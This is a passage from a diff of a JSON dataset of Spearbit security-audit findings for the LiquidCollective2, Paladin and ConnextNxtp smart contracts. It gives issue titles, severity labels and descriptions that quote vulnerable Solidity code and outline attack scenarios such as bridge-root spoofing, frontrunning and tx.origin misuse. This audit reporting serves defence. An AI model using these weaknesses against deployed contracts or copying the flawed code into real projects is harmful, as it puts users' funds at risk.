donations happen only after a slash/penalty event? Or is there a \"budget\" that will be dumped on the contract regardless of any slashing events? If a donation of XXX ETH is made, how is it handled? In a single transaction or distributed over a period of time? Explain carefully that when ETH is donated, no shares are minted. Explain all the possible market repercussions of the integration of Coverage Funds. Is there any off-chain validation process before donating? 29 Who are the entities that are enabled to donate to the fund? How is the Coverage Funds integrated inside the current Alluvial protocol? Any additional information useful for the users, investors, and other actors that interact with the protocol.", + "title": "Presence of delegate not enforced", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A delegate address on the destination chain can be used to fix stuck transactions by changing the slippage limits and by re-executing transactions. However, the presence of a delegate address isn't checked in _xcall(). Note: set to medium risk because tokens could get lost. function forceUpdateSlippage(TransferInfo calldata _params, uint256 _slippage) external onlyDelegate(_params) { ... } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { (bytes32 transferId, DestinationTransferStatus status) = _executeSanityChecks(_args); ... } function _executeSanityChecks(ExecuteArgs calldata _args) private view returns (bytes32,
DestinationTransferStatus) { // If the sender is not approved relayer, revert if (!s.approvedRelayers[msg.sender] && msg.sender != _args.params.delegate) { revert BridgeFacet__execute_unapprovedSender(); } }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Missing/wrong natspec comment and typos", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": " Natspec Missing part of the natspec comment for /// @notice Attempt to revoke at a relative to InvalidRevokedVestingScheduleEnd in IVestingScheduleManager Natspec missing the @return part for getVestingSchedule in IVestingScheduleManager. Wrong order of natspec @param for createVestingSchedule in IVestingScheduleManager. The @param _beneficiary should be placed before @param _delegatee to follow the function signature order. Natspec missing the @return part for delegateVestingEscrow in IVestingScheduleManager. Wrong natspec comment, operators should be replaced with vesting schedules for @custom:attribute of struct SlotVestingSchedule in VestingSchedules. 30 Wrong natspec parameter, replace operator with vesting schedule in the VestingSchedules.push func- tion. Missing @return natspec for _delegateVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _deterministicVestingEscrow in ERC20VestableVotesUpgradeable. Missing @return natspec for _getCurrentTime in ERC20VestableVotesUpgradeable. Add the Coverage Funds as a source of \"extra funds\" in the Oracle._pushToRiver natspec documentation in Oracle. Update the InvalidCall natspec in ICoverageFundV1 given that the error is thrown also in the receive() external payable function of CoverageFundV1. Update the natspec of struct VestingSchedule lockDuration attribute in VestingSchedules by explaining that the lock duration of a vesting schedule could possibly exceed the overall duration of the vesting. Update the natspec of lockDuration in ERC20VestableVotesUpgradeable by explaining that the lock dura- tion of a vesting schedule could possibly exceed the overall duration of the vesting. Consider making the natspec documentation of struct VestingSchedule in VestingSchedules and the natspec in ERC20VestableVotesUpgradeable be in sync. Add more examples (variations) to the natspec documentation of the vesting schedules example in ERC20VestableVotesUpgradeable to explain all the possible combination of scenarios. Make the ERC20VestableVotesUpgradeable natspec documentation about the vesting schedule consis- tent with the natspec documentation of _createVestingSchedule and VestingSchedules struct Vest- ingSchedule. Typos Replace all Overriden instances with Overridden in River. Replace transfer with transfers in ERC20VestableVotesUpgradeable.1.sol#L147. Replace token with tokens in ERC20VestableVotesUpgradeable.1.sol#L156.", + "title": "Relayer could lose funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The xReceive function on the receiver side can contain unreliable code which Relayer is unaware of. In the future, more relayers will participate in completing the transaction. Consider the following scenario: 1. Say that Relayer A executes the xReceive function on receiver side. 2. In the xReceive function, a call to withdraw function in a foreign contract is made where Relayer A is holding some balance. 3. 
If this foreign contract is checking tx.origin (say deposit/withdrawal were done via a third party), then Relayer A's funds will be withdrawn without his permission (since tx.origin will be the Relayer).", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Different behavior between River _pullELFees and _pullCoverageFunds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Both _pullELFees and _pullCoverageFunds implement the same functionality: Pull funds from a contract address. Update the balance storage variable. Emit an event. Return the amount of balance collected from the contract. The _pullCoverageFunds differs from the _pullELFees implementation by avoiding both updating the Balance- ToDeposit when collectedCoverageFunds == 0 and emitting the PulledCoverageFunds event. Because they are implementing the same functionality, they should follow the same behavior if there is not an explicit reason to not do so. 31", + "title": "TypedMemView.sameType does not use the correct right shift value to compare two bytes29s", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function sameType should shift 2 * 12 + 3 bytes to access the type flag (TTTTTTTTTT) when comparing it to 0. This is due to the fact that when using the bytes29 type in bitwise operations and also comparisons to 0, a parameter of type bytes29 is zero-padded from the right so that it fits into a uint256 under the hood. 0x TTTTTTTTTT AAAAAAAAAAAAAAAAAAAAAAAA LLLLLLLLLLLLLLLLLLLLLLLL 00 00 00 Currently, sameType only shifts the XORed value by 2 * 12 bytes, so the comparison compares the type flag and the 3 leading bytes of the memory address in the packing specified below: // First 5 bytes are a type flag. // - ff_ffff_fffe is reserved for unknown type. // - ff_ffff_ffff is reserved for invalid types/errors. // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The function is not used in the codebase but can pose an important issue if incorporated into the project in the future. function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> (2 * TWELVE_BYTES) == 0; }", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Move local mask variable from Allowlist.1.sol to LibAllowlistMasks.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "LibAllowlistMasks.sol is meant to contain all mask values, but DENY_MASK is a local variable in the Allowlist.1.sol contract.", + "title": "Incorrect formula for the scaled amplification coefficient in NatSpec comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the context above, the scaled amplification coefficient a is described by the formula A * n * (n - 1), where A is the actual amplification coefficient in the stable swap invariant equation for n tokens. * @param a the amplification coefficient * n * (n - 1) ... The actual adjusted/scaled amplification coefficient would need to be A * n^(n - 1) and not A * n * (n - 1), otherwise, most of the calculations done when swapping between 2 tokens in a pool with more than 2 tokens would be wrong.
For the special case of n = 2, those values are actually equal: 2^(2-1) = 2 = 2 * 1. So for swaps or pools that involve only 2 tokens, the issue in the comment is not so critical. But if the number of tokens is more than 2, then we need to make sure we calculate and feed the right parameter to AppStorage.swapStorages.{initial, future}A", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Consider adding additional parameters to the existing events to improve filtering/monitoring", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Some already defined events could be improved by adding more parameters to better track those events in dApps or monitoring tools. Consider adding address indexed delegatee as an event's parameter to event CreatedVestingSchedule. While it's true that after the vest/lock period the beneficiary will be the owner of those tokens, in the meanwhile (if _delegatee != address(0)) the voting power of all those vested tokens are delegated to the _delegatee. Consider adding address indexed beneficiary to event ReleasedVestingSchedule. Consider adding uint256 newEnd to event RevokedVestingSchedule to track the updated end of the vesting schedule. Consider adding address indexed beneficiary to event DelegatedVestingEscrow. If those events parameters are added to the events, the Alluvial team should also remember to update the relative natspec documentation.", + "title": "RootManager.propagate does not operate in a fail-safe manner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A bridge failure on one of the supported chains will cause the entire messaging network to break down. When the RootManager.propagate function is called, it will loop through the hub connector of all six chains (Arbitrum, Gnosis, Multichain, Optimism, Polygon, ZkSync) and attempt to send over the latest aggregated root by making a function call to the respective chain's AMB contract. There is a tight dependency between the chain's AMB and hub connector. The problem is that if one of the function calls to the chain's AMB contract reverts (e.g. one of the bridges is paused), the entire RootManager.propagate function will revert, and the messaging network will stop working until someone figures out the problem and manually removes the problematic hub connector. As Connext grows, the number of chains supported will increase, and the risk of this issue occurring will also increase.
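A fail-safe variant of the propagate loop can be sketched with try/catch (assumed connector interface, not the audited code): one paused or broken bridge is skipped and reported instead of blocking propagation to every other spoke.

pragma solidity ^0.8.15;

interface IHubConnectorLike {
    function sendMessage(bytes calldata data) external;
}

abstract contract FailSafePropagate {
    address[] public connectors;

    event PropagateFailed(address indexed connector, bytes reason);

    function _propagate(bytes memory aggregateRoot) internal {
        for (uint256 i = 0; i < connectors.length; i++) {
            try IHubConnectorLike(connectors[i]).sendMessage(aggregateRoot) {
                // delivered to this spoke's AMB
            } catch (bytes memory reason) {
                // a reverting AMB no longer reverts the whole loop
                emit PropagateFailed(connectors[i], reason);
            }
        }
    }
}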
donator should be declared as indexed in event Donate.", + "title": "Arborist once whitelisted cannot be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Arborist has the power to write over the Merkle root. In case an Arborist starts misbehaving (compromised or a security issue) then there is no way to remove this Arborist from the whitelist.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Add natspec documentation to the TLC contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The current implementation of TLC contract is missing natspec at the root level to explain the contract. The natspec should cover the basic explanation of the contract (like it has already been done in other contracts like River.sol) but also illustrate TLC token has a fixed max supply that is minted at deploy time. All the minted tokens are sent to a single account at deploy time. How TLC token will be distributed. How voting power works (you have to delegate to yourself to gain voting power). How the vesting process works. Other general information useful for the user/investor that receives the TLC token directly or vested.", + "title": "WatcherManager is not set correctly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The setWatcherManager function fails to actually update the watcherManager; instead, it just emits an event claiming that the WatcherManager was updated when it was not. This could become a problem once new modules are added/revised in the WatcherManager contract and WatcherClient wants to use this upgraded WatcherManager. WatcherClient will be forced to use the outdated WatcherManager contract code.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Verify user has indeed voted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "If an error is made in the merkle trees (either by accident or on purpose) a user that did not vote (in that period for that gauge) might get rewards assigned to him. Although the Paladin documentation says: \"the Curve DAO contract does not offer a mapping of votes for each Gauge for each Period\", it might still be possible to verify that a user has voted if the account, gauge and period are known. Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", + "title": "Check __GAPs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "All __GAPs have the same size, while the different contracts have a different number of storage variables. If the __GAP size isn't logical it is more difficult to maintain the code. Note: set to a risk rating of medium because the probability of something going wrong with future upgrades is low to medium, and the impact of mistakes would be medium to high. The intended convention is sketched below; the reviewed gaps are listed after it. 
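As an illustration of that convention (a minimal sketch with hypothetical contract and variable names, not code from the repository), the number of declared storage variables plus the __GAP length should stay constant, so an upgrade that appends a variable shrinks the gap instead of shifting the slots of inheriting contracts:

pragma solidity ^0.8.17;

// Hypothetical V1: 2 storage variables + 48 gap slots = 50 reserved slots.
contract ExampleUpgradeableV1 {
    uint256 internal valueA; // slot 0
    uint256 internal valueB; // slot 1
    uint256[48] private __GAP; // slots 2..49
}

// Hypothetical V2: the new variable takes a slot out of the gap, so the
// layout of inheriting contracts is unchanged (3 + 47 still equals 50).
contract ExampleUpgradeableV2 {
    uint256 internal valueA; // slot 0
    uint256 internal valueB; // slot 1
    uint256 internal valueC; // slot 2 (taken from the old gap)
    uint256[47] private __GAP; // slots 3..49
}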
LPToken.sol: uint256[49] private __GAP; // should probably be 50 OwnerPausableUpgradeable.sol: uint256[49] private __GAP; // should probably be 50 StableSwap.sol: uint256[49] private __GAP; // should probably be 48 Merkle.sol: uint256[49] private __GAP; // should probably be 48 ProposedOwnable.sol: uint256[49] private __GAP; // should probably be 47", "labels": [ "Spearbit", - "Paladin", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Tokens could be sent / withdrawn multiple times by accident", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Functions closeQuestPeriod() and closePartOfQuestPeriod() have similar functionality but in- terfere with each other. 1. Suppose you have closed the first quest of a period via closePartOfQuestPeriod(). Now you cannot use closeQuestPeriod() to close the rest of the periods, as closeQuestPeriod() checks the state of the first quest. 2. Suppose you have closed the second quest of a period via closePartOfQuestPeriod(), but closeQuest- Period() continues to work. It will close the second quest again and send the rewards of the second quest to the distributor, again. Also, function closeQuestPeriod() sets the withdrawableAmount value one more time, so the creator can do withdrawUnusedRewards() once more. Although both closeQuestPeriod() and closePartOfQuestPeriod() are authorized, the problems above could occur by accident. Additionally there is a lot of code duplication between closeQuestPeriod() and closePartOfQuestPeriod(), with a high risk of issues with future code changes. 5 function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... // We use the 1st QuestPeriod of this period to check it was not Closed uint256[] memory questsForPeriod = questsByPeriod[period]; require( ,! periodsByQuest[questsForPeriod[0]][period].currentState == PeriodState.ACTIVE, // only checks first period \"QuestBoard: Period already closed\" ); ... // no further checks on currentState _questPeriod.withdrawableAmount = .... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // sends tokens (again) ... } // sets withdrawableAmount (again) function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ,! ... _questPeriod.currentState = PeriodState.CLOSED; ... _questPeriod.withdrawableAmount = _questPeriod.rewardAmountPerPeriod - toDistributeAmount; IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); ... } Note: Set to high risk because the likelihood of this happening is medium, but the impact is high.", + "title": "Message can be delivered out of order", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Messages can be delivered out of order on the spoke. Anyone can call the permissionless proveAndProcess to process the messages in any order they want. 
A malicious user can force the spoke to process messages in a way that is beneficial to them (e.g., front-run).", "labels": [ "Spearbit", - "Paladin", - "Severity: High Risk" + "ConnextNxtp", + "Severity: Medium Risk" ] }, { - "title": "Limit possibilities of recoverERC20()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function recoverERC20() in contract MultiMerkleDistributor.sol allows the retrieval of all ERC20 tokens from the MultiMerkleDistributor.sol whereas the comment indicates it is only meant to retrieve those tokens that have been sent by mistake. Allowing to retrieve all tokens also enables the retrieval of legitimate ones. This way rewards cannot be collected anymore. It could be seen as allowing a rug pull by the project and should be avoided. In contrast, function recoverERC20() in contract QuestBoard.sol does prevent whitelisted tokens from being re- trieved. Note: The project could also add a merkle tree that allows for the retrieval of legitimate tokens to their own addresses. 6 * @notice Recovers ERC2O tokens sent by mistake to the contract contract MultiMerkleDistributor is Ownable { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { IERC20(token).safeTransfer(owner(), amount); return true; } } contract QuestBoard is Ownable, ReentrancyGuard { function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } }", + "title": "Extra checks in _verifySender() of GnosisBase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "According to the Gnosis bridge documentation the source chain id should also be checked using messageSourceChainId(). This is because in the future the same arbitrary message bridge contract could handle requests from different chains. If a malicious actor were able to gain access to the contract at mirrorConnector on a to-be-supported chain that is not the MIRROR_DOMAIN, they could send an arbitrary root to this mainnet/L1 hub connector, which the connector would mark as coming from the MIRROR_DOMAIN. So the attacker can spoof/forge function calls and asset transfers by creating a payload root and using this along with their access to mirrorConnector on that chain to send a cross-chain processMessage to the Gnosis hub connector, and afterwards they can use their payload root and proofs to forge/spoof transfers on the L1 chain. Although it is unlikely that any other party could add a contract with the same address as _amb on another chain, it is safer to add additional checks. function _verifySender(address _amb, address _expected) internal view returns (bool) { require(msg.sender == _amb, \"!bridge\"); return GnosisAmb(_amb).messageSender() == _expected; }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Medium Risk" ] }, { - "title": "Updating QuestBoard in MultiMerkleDistributor.sol will not work", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Updating QuestManager/ QuestBoard in MultiMerkleDistributor.sol will give the following issue: If the newQuestBoard uses the current implementation of QuestBoard.sol, it will start with questId == 0 again, thus attempting to overwrite previous quests. 
function updateQuestManager(address newQuestBoard) external onlyOwner { questBoard = newQuestBoard; }", + "title": "Absence of Minimum delayBlocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The owner can accidentally set delayBlocks to 0 (or a very small number of delay blocks), which would collapse the whole fraud protection mechanism. Since there is no check for a minimum delay before setting a new delay value, even a very low value will be accepted by the setDelayBlocks function: function setDelayBlocks(uint256 _delayBlocks) public onlyOwner { require(_delayBlocks != delayBlocks, \"!delayBlocks\"); emit DelayBlocksUpdated(_delayBlocks, delayBlocks); delayBlocks = _delayBlocks; }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Medium Risk" ] }, { - "title": "Old quests can be extended via increaseQuestDuration()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function increaseQuestDuration() does not check if a quest is already in the past. Extending a quest from the past in duration is probably not useful. It also might require additional calls to closePartOfQuest- Period(). function increaseQuestDuration(...) ... { updatePeriod(); ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... uint256 periodIterator = ((lastPeriod + WEEK) / WEEK) * WEEK; ... for(uint256 i = 0; i < addedDuration;){ ... periodsByQuest[questID][periodIterator]....= ... periodIterator = ((periodIterator + WEEK) / WEEK) * WEEK; unchecked{ ++i; } } ... }", + "title": "Add extra 0 checks in verifyAggregateRoot() and proveMessageRoot()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The functions verifyAggregateRoot() and proveMessageRoot() verify and confirm roots. A root value of 0 is a special case. If this value were allowed, then the functions could allow invalid roots to be passed. Currently the functions verifyAggregateRoot() and proveMessageRoot() don't explicitly verify the roots are not 0. function verifyAggregateRoot(bytes32 _aggregateRoot) internal { if (provenAggregateRoots[_aggregateRoot]) { return; } ... // do several verifications provenAggregateRoots[_aggregateRoot] = true; ... } function proveMessageRoot(...) ... { if (provenMessageRoots[_messageRoot]) { return; } ... // do several verifications provenMessageRoots[_messageRoot] = true; }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Medium Risk" ] }, { - "title": "Accidental call of addQuest could block contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The addQuest() function uses an onlyAllowed access control modifier. This modifier checks if msg.sender is questBoard or owner. However, the QuestBoard.sol contract has a QuestID registration and a token whitelisting mechanism which should be used in combination with addQuest() function. If owner accidentally calls addQuest(), the QuestBoard.sol contract will not be able to call addQuest() for that questID. As soon as createQuest() tries to add that same questID the function will revert, becoming uncallable because nextID still maintains that same value. function createQuest(...) ... { ... uint256 newQuestID = nextID; nextID += 1; ... 
require(MultiMerkleDistributor(distributor).addQuest(newQuestID, rewardToken), \"QuestBoard: Fail add to Distributor\"); ... ,! } 8 function addQuest(uint256 questID, address token) external onlyAllowed returns(bool) { require(questRewardToken[questID] == address(0), \"MultiMerkle: Quest already listed\"); require(token != address(0), \"MultiMerkle: Incorrect reward token\"); // Add a new Quest using the QuestID, and list the reward token for that Quest questRewardToken[questID] = token; emit NewQuest(questID, token); return true; } Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "_removeAssetId() should also clear custodied", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In one of the fixes in PR 2530, _removeAssetId() doesn't clear custodied as it is assumed to be 0. function _removeAssetId(...) ... { // NOTE: custodied will always be 0 at this point } However, custodied isn't always 0. Suppose cap and custodied both hold a non-zero value, and _setLiquidityCap() is then called to set the cap to 0. The function doesn't reset the custodied value, so it will stay non-zero.", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Reduce impact of emergencyUpdatequestPeriod()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function emergencyUpdatequestPeriod() allows the merkle tree to be updated. The merkle tree contains an embedded index parameter which is used to prevent double claims. When the merkleRoot is updated, the layout of indexes in the merkle tree could become different. Example: Suppose the initial merkle tree contains information for: - user A: index=1, account = 0x1234, amount=100 - user B: index=2, account = 0x5689, amount=200 Then user A claims => _setClaimed(..., 1) is set. Now it turns out a mistake is made with the merkle tree, and it should contain: - user B: index=1, account = 0x5689, amount=200 - user C: index=2, account = 0xabcd, amount=300 Now user B will not be able to claim because bit 1 has already been set. Under this situation the following issues can occur: Someone who has already claimed might be able to claim again. Someone who has already claimed has too much. Someone who has already claimed has too little, and cannot longer claim the rest because _setClaimed() has already been set. someone who has not yet claimed might not be able to claim because _setClaimed() has already been set by another user. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "Remove liquidity while paused", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function removeLiquidity() in StableSwapFacet.sol has a whenNotPaused modifier, while the comment says: Liquidity can always be removed, even when the pool is paused. On the other hand, the function removeLiquidity() in StableSwap.sol doesn't have this modifier. StableSwapFacet.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... }
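// Reviewer note (illustrative comment, not part of the quoted source): the
// whenNotPaused modifiers above contradict the comment claiming liquidity
// can always be removed; pausing the pool would also block withdrawals.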
StableSwap.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... }", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Verify the correct merkle tree is used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The MultiMerkleDistributor.sol contract does not verify that the merkle tree belongs to the right quest and period. If the wrong merkle tree is added then the wrong rewards can be claimed. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "Relayers can frontrun each other's calls to BridgeFacet.execute", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Relayers can front-run each other's calls to BridgeFacet.execute. Currently, there is no on-chain mechanism to track how many fees should be allocated to each relayer. All the transfer bump fees are funneled into one address s.relayerFeeVault.", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Prevent mixing rewards from different quests and periods", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The MultiMerkleDistributor.sol contract does not verify that the sum of all amounts in the merkle tree are equal to the rewards allocated for that quest and for that period. This could happen if there is a bug in the merkle tree creation script. If the sum of the amounts is too high, then tokens from other quests or other periods could be claimed, which will give problems later on, when claims are done for the other quest/periods. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", + "title": "OptimismHubConnector.processMessageFromRoot emits MessageProcessed for already processed messages", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Calls to processMessageFromRoot with an already processed _data still emit MessageProcessed. This might cause issues for off-chain agents like relayers monitoring this event.", "labels": [ "Spearbit", - "Paladin", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Nonexistent zero address check for newQuestBoard in updateQuestManager function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Nonexistent zero address check for newQuestBoard in updateQuestManager function. Assigning newQuestBoard to a zero address may cause unintended behavior.", + "title": "Add max cap for domains", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Currently there isn't any cap on the maximum number of domains the system can support. 
If the set of domains and connectors grows, both addDomain and removeDomain could at some point be DoSed by out-of-gas errors in the updateHashes function.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Verify period is always a multiple of week", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The calculations with period assume that period is a multiple of WEEK. However, period is often assigned as a parameter and not verified if it is a multiple of WEEK. This calculation may cause unexpected results. Note: When it is verified that period is a multiple of WEEK, the following calculation can be simplified: - int256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; + int256 nextPeriod = period + WEEK; The following function does not explicitly verify that period is a multiple of WEEK. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... uint256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; ... } function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { ... } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) ... { ... } function addMerkleRoot(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function addMultipleMerkleRoot(..., uint256 period, ...) external isAlive onlyAllowed nonReentrant { ... } ,! function claim(..., uint256 period, ...) public { ... } function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function claimQuest(address account, uint256 questID, ClaimParams[] calldata claims) external { ,! ... // also uses period as part of the claims array require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, \"MultiMerkle: not updated yet\"); require(!isClaimed(questID, claims[i].period, claims[i].index), \"MultiMerkle: already claimed\"); ... require( MerkleProof.verify(claims[i].merkleProof, questMerkleRootPerPeriod[questID][claims[i].period], ,! node), \"MultiMerkle: Invalid proof\" ); ... _setClaimed(questID, claims[i].period, claims[i].index); ... emit Claimed(questID, claims[i].period, claims[i].index, claims[i].amount, rewardToken, account); ... }", + "title": "In certain scenarios calls to xcall... or addRouterLiquidity... can be DoSed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The owner or an admin can frontrun (possibly by accident) a call that: A router has made on a canonical domain of a canonical token to supply that token as liquidity, OR A user has made to xcall... supplying a canonical token on its canonical domain. The frontrunning call would set the cap to a low number (calling updateLiquidityCap). This would cause the calls mentioned in the bullet list to fail due to the checks against IERC20(_local).balanceOf(address(this)).", "labels": [ "Spearbit", - "Paladin", - "Severity: Low Risk QuestBoard.sol#L201-L203, QuestBoard.sol#L750-L815," + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Missing safety check to ensure array length does not underflow and revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Several functions use questPeriods[questID][questPeriods[questID].length - 1]. 
The sec- ond value in the questPeriods mapping is questPeriods[questID].length - 1. It is possible for this function to revert if the case arises where questPeriods[questID].length is 0. Looking at the code this is not likely to occur but it is a valid safety check that covers possible strange edge cases. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestDuration(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestReward(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestObjective(... ) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... }", + "title": "Missing a check against address(0) in ConnextPriceOracle's constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When ConnextPriceOracle is deployed, an address _wrapped is passed to its constructor. The current codebase does not check whether the passed _wrapped is address(0).", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Prevent dual entry point tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Function recoverERC20() in contract 